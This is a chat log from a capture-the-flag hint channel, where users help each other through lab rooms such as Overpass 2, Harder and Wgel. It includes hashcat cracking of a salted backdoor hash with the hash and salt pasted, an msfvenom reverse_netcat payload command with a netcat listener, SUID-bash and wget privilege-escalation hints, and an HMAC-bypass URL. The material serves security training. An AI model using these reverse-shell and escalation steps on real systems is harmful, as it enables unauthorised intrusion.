If you'd like hints, you'll have to actually ask

steady elm
#

I am trying to solve Overpass and after starting backdoor it says started listening at but i am not able to connect to it using netcat. what am i missing?

trim haven
#

Starting the backdoor?

#

This is overpass 1 or 2?

steady elm
#

overpass 2

#

Starting the backdoor?
@trim haven i think we will use the backdoor to connect to the target

trim haven
#

ssh -p 2222 <Machine IP>

steady elm
#

so we basically cracked the intruder password and then used the same backdoor which he used to open port and connect to that port using ssh. But i dont know why i thought i could use netcat to connect to that machine port

trim haven
#

Aha no

#

It’s an ssh backdoor

#

So you just ssh into it! πŸ˜„

cyan token
#

Any hints for Overpass root flag? I checked all the basic stuffs i could for priv esc.

trim haven
#

Overpass 1?

cyan token
#

yes.

trim haven
#

Have you ran linpeas on the machine?

#

You need to find out what you can and can’t control

cyan token
#

Alright. I'll do that.

lucid crescent
#

any hint for cracking salted password in overpass2

cyan token
#

Did you check out github source code? See if it is pass+salt or salt+pass? Does hashcat have a mode for it ?

lucid crescent
#

ok

#

but i think its password + salt @cyan token

cyan token
#

Yup

lucid crescent
#

so how do i crack password+salt i couldnt find it from google

cyan token
lucid crescent
#

@cyan token thats hashcat

#

i said i want to crack it with john

brave bear
#

Hi i had a doubt the new overpass2 box i have the user now

lucid crescent
#

also i dont thing that hash is md5 @cyan token

cyan token
#

yes it's not.

lucid crescent
#

so ...

brave bear
#

||i found a suid_bash file but to run it you need james password which is in pcap and i used that one and it didnt yield any results is it supposed to be like that||

#

@lucid crescent it is here in this one and you are correct

#

you can use some tool to figure what algo it is

#

and then look for that + salt mode in this and then use hashcat to crack it

#

||and if i am not wrong you can append the salt with : and also use jtr||

trim haven
#

You don’t need any password to run the SUID file

brave bear
#

huh

#

for me it prompts it

#

okay i will give it a go again

trim haven
#

sudo -l

brave bear
#

i cant run that without a password too

trim haven
#

I’m 100% sure you don’t need a password for the SUID

brave bear
#

i will give it a go

trim haven
#

How are you running the file?

brave bear
#

sudo file

#

i also tried the full path

trim haven
#

Have you tried just

#

./binary

brave bear
#

i will give that a go but i think i did and didnt get the shell as root

trim haven
#

You’re not meant to

brave bear
#

ohhh okaayy

trim haven
#

You’re meant to abuse it for privesc

brave bear
#

alrightty will give it a go thanks for the help

lucid crescent
#

my problem in overpass2$ sudo john --format=sha256:salt --wordlist=ctf/rockyou.txt hashes.hash Unknown ciphertext format name requested

trim haven
#

That’s not how you format

#

Usually

#

Also someone have you a hashes website for hashcat...?

#

I mean the error does tell you that the format name is incorrect

lucid crescent
#

so how do i crack sha256 + salt in john

brave bear
#

i would recommend going with hashcat

lucid crescent
#

i need GPU for hashcat

trim haven
#

You don’t

brave bear
#

you dont

lucid crescent
#

so tell me how to run it on CPU

trim haven
#

Also everyone has a GPU so that’s not an excuse

brave bear
#

it will be faster on a better GPU but that doesnt mean you cant run it

#

also you can downlaod hashcat on your main windows

#

and use that to crack stuff

#

it will be faster but with this one you wont even need to wait that long

dire sail
#

Hi. I have a problem in scripting room. When I am trying to connect to the next port on server, it gives me the connection refused error. Tried to google this error and didn't find anything. Can u give some hints on what to check to solve this error?

lucid crescent
#

so because i never used hashcat

#

can someone tell me how to do that

brave bear
#

hashcat -m modenumber texthashesfile.txt rockyou.txt -O

#

you can remove the -O and add --force i think if i am not wrong

lucid crescent
#

||-m sha256($pass.$salt)||

#

correct??

brave bear
#

modenumber can be in the doku file i sent

#

nope

#

look for what you said here

lucid crescent
#

whats the problem??

brave bear
#

and get the number

#

Hash-Mode

lucid crescent
#

||-m 110||

#

correct??

brave bear
#

nope thats not what you are looking for in this case

#

thats for sha1

#

you need it for something else

lucid crescent
#
hashcat (v5.1.0) starting...

* Device #1: Not a native Intel OpenCL runtime. Expect massive speed loss.
             You can use --force to override, but do not report related errors.
No devices found/left.

Started: Tue Aug 18 11:15:32 2020
Stopped: Tue Aug 18 11:15:32 2020```
brave bear
#

add --force at the end

#

and thats not the right mode

#

look for what hash you are cracking

#

and then find its hash-mode

lucid crescent
#

||-m 1410||

brave bear
#

i cant keep confirming i think

#

cause that would be kinda giving the answer

#

again its not correct if you get this

lucid crescent
#
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU

Hashfile 'hash.hash' on line 1 ($6$7GS...VuRskugt1Ckul/SKGX.5PyMpzAYo3Cg/): Separator unmatched
No hashes loaded.

Started: Tue Aug 18 11:17:38 2020
Stopped: Tue Aug 18 11:17:38 2020```
#

whats the problem??

brave bear
#

wrong mode and wrong algo

#

again research what algo you are cracking and look fro its appropriate hash mode

lucid crescent
#

is this ||6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed||a right one??

cyan token
#

Look at main.go in github. What algorithm is it ?

brave bear
#

i dont remember that on the top of my head and again the hash and salt have to seperated with : and look for the right algo

lucid crescent
#

it was ||sha512||

brave bear
#

you got it?

lucid crescent
#
hashcat (v5.1.0) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz, 4096/13861 MB allocatable, 8MCU

Hashfile 'hash.hash' on line 1 (bdd04d...7d8391dfc885d0e9b68acd01fc2170e3): Separator unmatched
No hashes loaded.

Started: Tue Aug 18 11:23:05 2020
Stopped: Tue Aug 18 11:23:05 2020```
#

no @brave bear

brave bear
#

see the error

#

Separtor isnt there if i am not wrong

sinful plaza
#

can someone give me a nudge on the dijinn room do i have to answer all 1000 question??

brave bear
#

user or root?

#

and where are you?

#

what have you tried

trim haven
#

@lucid crescent Show us the hash.hash file please

lucid crescent
#

i cant get whats the problem i copy and paste the hash which wroten in main.go and found that was ||sha512|| and that is ||password + hash||

brave bear
#

yeaah but you have to add a seperator

lucid crescent
#

||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3|| @trim haven

brave bear
#

yup you dont have the separator for the password and hash

trim haven
#

Where the hell is the salt

#

hash:salt

brave bear
#

ohh yeaah that too hahah

#

you cant crack a password hashed with salt without the salt

trim haven
#

No

#

You need to tell the tool where the salt is

#

I'm 90% sure the salt is there it's just not in the format

lucid crescent
#

so can someone say what i need to do

#

i need to define salt??

brave bear
#

find the salt

#

||hash:salt||

#

thats how it should be for cracking

lucid crescent
#

||1c362db832f3f864c8c2fe05f2002a05|| here is the salt

brave bear
#

so add it

#

in the format

#

adn then crack it

lucid crescent
#

do i need to edit the hash.hash??

#

or define it in hashcat @brave bear

brave bear
#

in hash.hash

lucid crescent
#

ok

#

||$ cat hash.hash | grep 1c362db832f3f864c8c2fe05f2002a05|| found nothing in it

trim haven
#

wut

#

Why are you doing that

#

Just edit the file

#

and put

lucid crescent
#

ok

sinful plaza
#

anyone

#

can someone give me a nudge on the dijinn room do i have to answer all 1000 question??

trim haven
#

thisisthehash:thisisthesalt

brave bear
#

@sinful plaza

#

user or root?
and where are you?
what have you tried

#

You gotta give some context first

#

which step are you at etc.

sinful plaza
#

try answering the question but is taking to long

You gotta give some context first
@brave bear

brave bear
#

whcih binary again

lucid crescent
#

||i found this 14344392|| but it was incorrect

brave bear
#

and what have you tried

mossy ermine
#

Hey Guys. I would really appreciate any hint on the boiler ctf room. Until now I've enumerated the services and find some directories with dirbuster. I also have a sort of password (not sure) founded on || /joomla/_files/index.html ||
Thank you for your attention πŸ˜‹ πŸ’―

brave bear
#

can you show the hash.hash file again dude

sinful plaza
#

user or root?
and where are you?
what have you tried
@brave bear user

brave bear
#

soo the genie binary

#

you dont have to answer the thing you have to find a certain command that you can use in it

lucid crescent
#

||bdd04d9bb7621687f5df9001f5098eb22bf19eac4c2c30b6f23efed4d24807277d0f8bfccb9e77659103d78c56e66d2d7d8391dfc885d0e9b68acd01fc2170e3:1c362db832f3f864c8c2fe05f2002a05|| @brave bear

brave bear
#

Think about how you can get that command

sinful plaza
#

you dont have to answer the thing you have to find a certain command that you can use in it
@brave bear ohh thanks

brave bear
#

i think the hash is right

sinful plaza
#

Think about how you can get that command
@brave bear sure thanks

cyan token
#

Overpass2, how am i supposed to || abuse setuid_bash || ? A realllly tiny tiny bit of hint would be naice.

brave bear
#

nvm @lucid crescent i think thats the wrong hash you got there

mossy ermine
#

Hey Guys. I would really appreciate any hint on the boiler ctf room. Until now I've enumerated the services and find some directories with dirbuster. I also have a sort of password (not sure) founded on || /joomla/_files/index.html ||
Thank you for your attention πŸ˜‹ πŸ’―
@mossy ermine Just a little up. Really stucked on the last question on task 1

sinful plaza
#

Overpass2, how am i supposed to || abuse setuid_bash || ? A realllly tiny tiny bit of hint would be naice.
@cyan token what have u try??

trim haven
#

Have you tried running it

cyan token
#

After running, I'm still james...

trim haven
#

Run it, do you get a prompt?

cyan token
#

yes

trim haven
#

And have you tried running help

cyan token
#

ohkk thanks. I'll figure it out now.

sinful plaza
#

@brave bear can i DM

brave bear
#

sure

eternal brook
#

Hey I think I got a ||sha1 hash || in harder room I'm trying to crack it with hash cat but it's taking a lot of time

#

Does it take long to crack?

lucid crescent
#

nvm @lucid crescent i think thats the wrong hash you got there
@brave bear can u tell me which hash i must to crack???

brave bear
#

its in the pcap

trim haven
#

Are you still on overpass 2?

lucid crescent
#

i copied that from main.go file

brave bear
#

thats not the one

#

thats the default one

lucid crescent
#

Are you still on overpass 2?
@trim haven no, i went to somewhere

trim haven
#

I mean you used the right one for hashcat

lucid crescent
#

i must to crack james password from pcap right??

trim haven
#

No

#

That won't help you

lucid crescent
#

its in the pcap
@brave bear he tell

trim haven
#

Did you crack the hash for the backdoor?

lucid crescent
#

u mean main.go

trim haven
#

Task 4 correct?

#

I mean 3

#

SHOOT

#

I mean 2

#

This one Crack the hash using rockyou and a cracking tool of your choice. What's the password?

lucid crescent
#

yes

trim haven
#

You were using the right hash earlier

#

You're meant to use the one from question 3

#

What was the hash that the attacker used? - go back to the PCAP for this!

lucid crescent
#

ok got it

#

but what is the salt?

trim haven
#

Then you go to the github to get the salt

#

If you look on hash lists for hashcat, it will say Hashname, hash:salt

#

As the hash is salted

#

You need to store it in the file in that format

#

Then hashcat will recognise that the hash has a salt and will use the salt

lucid crescent
#

ok

trim haven
limber iron
#

Hey, room : Overpass_v2.
I got the pass for [TASK2] #4 and it's correct. is it for user ||james||

trim haven
#

The "Hacker" changes the password so none of the passwords from the /etc/passwd file will work

limber iron
#

I cracked it with the salt from |||github||| and the last hash he got

trim haven
#

Oh so you cracked it?

limber iron
#

Yes

#

But doesn't seem to log in ssh

trim haven
#

Well the whole of that section is about analysing the backdoor

limber iron
#

Maybe specify a certain port ?

trim haven
#

Perform your nmap scan again and look for any strange ports

limber iron
#

Okay thank you

lucid crescent
#

@trim haven salt is ||1c362db832f3f864c8c2fe05f2002a05|| right???

trim haven
#

Yup

#

Now put it in the file hash.txt or whatever in the format ||hashfromquestion4:1c362db832f3f864c8c2fe05f2002a05 ||

lucid crescent
#

and hash type is ||sha512||??

trim haven
#

Are you using kali?

lucid crescent
#

yes

trim haven
#

In your terminal type hash-identifier then paste the hash when it prompts you to

lucid crescent
#

ok cracked

#

thx

limber iron
#

@trim haven hey any hints on priv esc after running that ||binary||

trim haven
#

ls -lAh ~

limber iron
#

??

#

sorry didn't get it ?

final mortar
#

Look closely in the home directory @limber iron

#

That's a fancy command πŸ˜„ @trim haven

trim haven
#

(stole it from James)

limber iron
#

@final mortar Hha i am i don't know really what i'm looking at πŸ‘€

trim haven
#

@final mortar Hha i am i don't know really what i'm looking at πŸ‘€
@limber iron It shows you hidden files..

limber iron
#

Yesss it did

final mortar
#

It's not something special tho. -A doesn't list . and .. and -h displays size with units

#

I will stick to ls -la

limber iron
#

@final mortar haha me too πŸ˜„

final mortar
#

So you found something useful ?

limber iron
#

Is that ||.suid.bash|| ?

final mortar
#

maybe πŸ‘€ what do you think

limber iron
#

Haha i did run it and i still have no idea on how to escalate to root with it xD

final mortar
#

try googling suid and bash together maybe

limber iron
#

Okey sure thanks a lot

final mortar
#

try gtfo, google, things. do research

cyan token
#

Overpass 2, am i going in the right direction || bash 4.4 has a priv esc vulnerability - autocompletion ||?

trim haven
#

I mean

limber iron
#

Thank you @final mortar got it

trim haven
#

Doubt it?

cyan token
#

hm

trim haven
#

Have you ran ls -lAh ~ in the home directory?

final mortar
#

We just discussed that with bvr0n @cyan token fell free to scroll up

cyan token
#

i see that heheh

#

I can see that hidden file using the usual ls -la why should i use that?

final mortar
#

You can just use ls -la all right

trim haven
#

Fancy command is better

final mortar
#

xD sure

cyan token
#

lol

white salmon
#

Hello, i get stucked in root from Looking Glass. Can you give me a little hint pleas? Thanks

patent token
#

I apologize. The room is new and hints aren't offered for the first several days of a release.

white salmon
#

And for overpass 2?

#

The same

trim haven
#

overpass 2 is walkthrough, that doesn't apply to the rule

white salmon
#

Is a walkthrough?

#

The sudo password isn't working lmao

trim haven
#

sudo password?

white salmon
#

In the pcap you find user james password

#

And he has sudo privilegues

trim haven
#

All user passwords were changed by the hackers

#

You have to find the ssh password

white salmon
#

i forget -p

coarse gull
#

hi all... can i ask a little hint on Overpasss2? i completed the TASK2, but i have no idea how to use the backdoor to hack back in....😩

trim haven
#

It's an ssh backdoor

#

There's a keyword in the name ;)

coarse gull
#

i figured it was not a ssh service... but still have no idea how to use it... in the github is not present instruction/readme about how to use it...

woven mirage
#

The backdoor is running in a port, try to discover wich port

coarse gull
#

2222 tcp ethernetip-1 open OpenSSH 8.2p1 Debian 4 protocol 2.02222 tcp ethernetip-1 open OpenSSH 8.2p1 Debian 4 protocol 2.0

#

i got this from nmap.... but still can't ssh user@ip:222

#

2222^

woven mirage
#

use man ssh

#

to see how to connect to a different port

coarse gull
#

ssh: Could not resolve hostname ip:2222: Name or service not known

#

oh ok... i used ip:port... i will look at man

#

thanks

sick sun
#

anyone know this cipher text ||hE a dC fH a :: hE a dC fH a hA iJ a eI aD jB cB hH gA a fH fN||

#

?

woven mirage
#

you need to figure out the logic

#

try to figure out what words could come from this encoded message so you can discover how to decode it

sick sun
#

i dont understand with this ciphertext blobhuh

woven mirage
#

this cipher was made by the creator for this box

#

you wont find it on the internet

#

you need to make a script yourself and decode it

sick sun
#

@woven mirage can i PM you

#

need help

woven mirage
#

yes

white salmon
#

break it task 2 #3 Is there a logical way of solving this?

quartz ruin
#

please anyone give me hint python room?

trim haven
#

If you're talking about the python coding room, we can't really give you a hint

stuck fractal
#

Outermost layers are base16

#

There's your hint

tight tendon
#

anyone give me a hint on getting the root.txt on overpass2...how do i execute the function of the py file to get root 😦 ive been stuck for hours

stuck fractal
#

@tight tendon There's no python file

tight tendon
#

the backdoor file used by the hackers?? 😦

stuck fractal
#

ls -lAh ~ and you will see everything you need

#

the backdoor file used by the hackers?? 😦
@tight tendon Not python

tight tendon
#

okay i will try thank you πŸ˜„

stuck fractal
#

Very much not python

tight tendon
#

my mistake am still a noob XD

#

cant seem to find a solution 😦

stuck fractal
#

There's a rather obviously named file in your home directory

#

You can use that after some research

pastel helm
#

So, I'm stuck on Linux Challenges, flag #16. I've tried using findmnt and find commands, but haven't been able to turn anything up. I'm sure I'm missing something simple or I've gone down the wrong rabbit hole trying to find the flag.

stuck fractal
#

The hint refers to the location

#

Not so much the method of finding it

pastel helm
#

Ok, I'll keep looking around, thanks!

rose elbow
#

Hi All, Any hint regarding initial foothold for SET room...

final mortar
#

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

  • What room you are on
  • At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
  • What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done
arctic crystal
#

Room: Wgel Ctf
I have got the user flag need hint for priv esc
I have tried to transfer file using ||wget|| but it is asking for password even when I'm allowed to run that command without password

final mortar
#

Have you tried googling wget privilege escalation

#

gtfo isn't guaranteed to work everytime

arctic crystal
#

I wasn't doing it using gtfo

#

I found one article on that priv esc
nvm I got it

#

silly mistake

final mortar
#

The first one actually tells you how to do it ^^

arctic crystal
#

I was typing /user/bin/wget instead of /usr/* πŸ˜…

final mortar
#

It's all good, as long are you learned something

eternal brook
#

harder room

rose moat
#

hi , msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens

oblique cliff
#

hi , msfvenom -p cmd/unix/reverse_netcat lhost= "my kali vpn ip address" lport=4444 R

In the telnet session i execute .RUN the result of msfvenom, but nothing happens
@rose moat can you show screenshots please?

rose moat
#

I used nc -lvp 4444 but none

oblique cliff
#

hmm i dont see anything wrong

#

did the ping work?

final mortar
#

apart from that room being buggy

eternal brook
#

harder?

final mortar
#

um what ?

oblique cliff
#

i dont see the welcome message when you connect, is that the correct port?

rose moat
#

ping works but nothing from mkfifo

eternal brook
#

ah i thought you were answering my query on harder room

final mortar
#

ah I must have missed that

#

where is it

eternal brook
#

few scrolls up

final mortar
#

I see

eternal brook
#

just above zavazkey question

final mortar
#

one thing that I can see right away is that you forgot to assign a value to the n[]

eternal brook
final mortar
#

so it's null

eternal brook
#

aren't we supposed to assign null array

final mortar
#

and as the ||isset|| defines, nothing will happen if n is null

eternal brook
#

?nonce[]=&hostname=securify.nl&hmac=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5 i coppied this syntax that i saw in a blog

#

oh ok

final mortar
#

that works, bust based of a different principal ig

#

if you are referring n, make sure it's not null

eternal brook
#

i tried putting value 0,1 still same

#

the login page only pops up

#

i've re ran my vpn rebooted the machine don't know what else to try...

final mortar
#

Have you understood what the php script actually does

#

Yeah my b. n array is supposed to be empty

eternal brook
#

the index.php calls 2 pages auth and hmac...

#

and there are variables that we can assign given the hmac page...

final mortar
#

yeah the articled should work just fine

eternal brook
#

i understood the blog and hmac function..

#

yea

final mortar
#

but you actually can't use the nonce array

eternal brook
#

don't know why is'nt it working

final mortar
#

it's referred to as n in this room

eternal brook
#

yea i got that

#

i used n only

final mortar
#

||/n[]=&host=securify.nl&h=c8ef9458af67da9c9086078ad3acc8ae71713af4e27d35fd8d02d0078f7ca3f5||
doesn't work ?

eternal brook
#

i understood the concept i generated my hash using hmac function but still it's not working

#

i'll try 1 sec

#

nope😩

final mortar
#

Really

#

Can I have your machine ip

eternal brook
#

i've cleared my history too

#

here?

#

or dm?

final mortar
#

Here is ok

#

Machine IP

eternal brook
#

yea that's my tun0 ip

final mortar
#

as in the "deployed " machine ip

#

yea that's my tun0 ip
@eternal brook Yea not that. That's your internal vpn ip

eternal brook
#

oh shit my bad

#

10.10.45.150

#

here it is

final mortar
#

You get a login page when you visit the ---.harder.local yes ?

eternal brook
#

yess

final mortar
#

try clicking on remember me, or you haven't figured out the "creds" yet ?

eternal brook
#

i get a 404 not found

#

tried both the req yours too and mine too

final mortar
#

/n[]=1&host=ros.com&h=73aeb29c6c1c96be662ca4b240afe6bfc950c2f60d6c612e7b4f79a92d662701

#

here try the n[]=1

eternal brook
#

tried that

#

thank you so much for your help anyway appreciate it πŸ‘ πŸ™‚

final mortar
#

that's your machine

#

try with the exact same url as I sent you above, all are not same πŸ˜‰

#

make sure you check the "remember me" checkbox when logging in (that caused issues with my buddy)

eternal brook
#

ok alright thank you so much i'll try that too

final mortar
#

All right

#

I have to go now, so good luck πŸ‘ πŸ™‚

eternal brook
#

no issues mann thanks alot πŸ™‚

copper dome
#

Hi guys, new user here. Would really appreciate some help. I'm stuck in task 12, #1 in 'The OWASP Top 10'. I'm not sure which webapp it is referring too.

stuck fractal
#

The webapp

#

Running on the VM

#

That you deployed for that task

#

Deploy button for it is in task 9

royal venture
#

i'm looking at vulnversity, and when running nmap with the ||-O|| flag, to find the most likely OS, all it says is 'no exact OS matches for host', and doesn't tell me what the "most likely" OS is

stuck fractal
#
  1. It's asking for the distro
#
  1. In the fingerprint it gives you, the OS is listed in there
#
  1. The distro tends to be in the SSH fingerprint or fingerprint for other services. Try a service version scan
royal venture
#

if it meant distro why doesnt it say distro

stuck fractal
#

Because no one has changed it yet

royal venture
#

nothing i can see in these seems to be the answer

#

nvm, found it

copper dome
#

@stuck fractal I've deployed my machine and read through task 10 as well. Is it referring to the example.db?

stuck fractal
#

Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.

#

The web application

#

The website

copper dome
#

Is the website the one mentioned in task 8?

stuck fractal
#

The website

#

Is an web application

#

Running on the box that you deployed

copper dome
#

When I hit deploy, I get my regular kali desktop screen. Which website?

stuck fractal
#

You need to click the deploy button in the room

#

The Kali is for you to use to attack

#

You need to deploy the target machine

#

Have you completed the Welcome room yet?

copper dome
#

Yes I have but I'll try again, one moment

#

I opened my trackhackme box and I only get a terminal window

stuck fractal
#

The VM that you deploy on my-machine is your attacking machine

#

It is the machine you use to attack other machines

#

You need to deploy that other machine

#

With the deploy button. In task 9.

copper dome
#

when I click the deploy in task 9, it says the machine is already running

stuck fractal
#

Ok, then the IP address at the top of the page under Active Machine Information is the one that you need

copper dome
#

Ok ill try that

#

What i did was typed [MY_IP]/login in firefox to get to the webapp. Its not opening anything. Am I in the right direction?

stuck fractal
#

No

#

What machine is running the web server?

copper dome
#

😩

royal venture
#

why are you typing your ip there, are you the one running the website?

#

also uh

#

there is no "sniper" attack type in the payloads tab

#

there is in the positions tab

trim haven
#

wut

royal venture
#

but if i just set it in there and start the attack after doing everything else, it says i need to do something in payloads, too

trim haven
#

Click on "payload type"

royal venture
#

tried that, there's nothing about "sniper" in there

trim haven
#

Strange.

copper dome
#

hold on, ive terminated and tried running it again

trim haven
#

I can't remember from the last time I used the tool.

royal venture
#

@copper dome it is not your ip that the website is running on

#

nvm i think i misunderstood the guide because it ommitted some info

#

...or not, gdi

#

they're all allowed?

trim haven
#

Room?

royal venture
#

task 4

stuck fractal
#

@royal venture Toggle the payload encoding

#

Needs to be off I think

#

Or on. Whatever it isn't now.

royal venture
#

still all 200

stuck fractal
#

Then you're doing something else wrong

royal venture
#

well idk man im following the room exactly

stuck fractal
#

And without context, we can't help

royal venture
#

you need context, read the room, because i am doing exactly as it says

stuck fractal
#

I've completed the room